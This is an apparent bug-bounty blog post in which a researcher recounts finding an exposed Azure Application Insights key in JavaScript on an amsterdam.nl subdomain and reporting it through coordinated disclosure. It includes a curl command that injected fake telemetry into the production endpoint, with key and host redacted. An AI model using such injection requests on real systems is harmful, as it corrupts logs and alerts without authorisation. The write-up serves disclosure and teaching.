How I Pwned Telemetry on Amsterdam.nl a Simple JS Scan Landed Me in Amsterdam's Hall of Fame (Swag Pending Lol)
Yo whats up peeps, its MRKNIGHT-NIDU here! Today Im spilling the tea on how I nabbed this high sev find on a subdomain of amsterdam.nl, got into their Hall of Fame, and uh… still waiting on that swag. Its been a wild ride, but lemme break it down from the start.
The trigger: That lit Linkedin post
It all popped off when I was doomscrolling on LinkedIn. Saw this post from a researcher who scored some dope swag and Hall of Fame vibes for reporting a bug to amsterdam.nl.I was like, Bet, I want that too! So I jumped into recon on amsterdam.nl domains. Who doesnt love a hunt with potential rewards, no cap?
I fired up my private tools to scoop all the subdomains of amsterdam.nl. One by one, I checked em out testing features, looking for sus stuff, but nada at first. Then I hit this interesting subdomain: https://don'tknow.amsterdam.nl/ lol, the names kinda funny now. For the privacy i choose this name!
Didnt see much on the surface, so I dipped into the source code. In the browser console, I check all the JS files and ran a script in console to hunt hidden API keys. Boom yo, I got it: a straight up exposed Instrumentation Key for Azure. The key? fa239857–there-is-not-api-bf76-read-the-blog-bro!. It was chilling in client-side JS, easy pickings.
Me to my self:
But but but, just finding a key? Nah, triage teams would close that as informative real quick. So I had to level up, exploit it, and show the impact.
Proving It: Whipping Up the PoC
With this key, anyone could inject fake telemetry without auth. Like, it could:
Mess up logs and metrics
Fake alerts or hide real ones
Junk up dashboards
Help red teams with noise cover
To show it, I made a simple curl PoC to shoot fake data into production:
curl -X POST https://blah-blah-blah-5.in.yo-yo-yo-yo.azure.com/v2/track -H Content-Type: application/json -d {name: Microsoft.ApplicationInsights.Event, time: 2025–07–02T12:34:56.789Z, iKey: fa239857–there-is-not-api-bf76-read-the-blog-bro, data: {baseType: EventData, baseData: {name: Test_Injection, properties: {environment: production, alert: FAKE TELEMETRY INJECTED, author: MRKNIGHT-NIDU}}}}
Response came back like:
{itemsReceived:1,itemsAccepted:1,appId:null,errors:[]}
Yo, it worked system ate my fake stuff no questions asked.
This proved its exploitable and hits hard on data vibes.
Sev Level and Mapping
I called it HIGH sev:
Exposure: Prod key in JS, out in the open.
Auth: Zero public POST go brr.
Impact: Wrecks logging, alerts, analytics.
Likelihood: Super high browser inspect and done.
Maps to OWASP A6:2021 Vuln Components and logging injection. Kinda like CVE-2021–42306 and other App Insights key dramas.
Reporting and the W
I put together a clean report with poc and sent it via their CVD on Zerocopter on 02/07/2025. Two days later, team hits back triaged as high, accepted! They added me to the Hall of Fame on the municipal info sec site go check it. Policy says maybe a token of appreciation hoping for Amsterdam swag.
Hall Of Fame: https://www.informatiebeveiligingsdienst.nl/responsible-disclosure/2025-coordinated-vulnerability-disclosure-hall-of-fame/
The Wait Game…
Now its 28/11/2025 almost five months, and I havent got my swag yet. Lol, Im about to cry fr.
But the Hall of Fame is fire, and helping secure public stuff feels good. Bug hunting aint just about rewards; its the thrill and impact.
Hope you vibe with my story! If youre hunting, drop your tales below. Amsterdam team, if you see this, swag pls?
Stay safe out there!
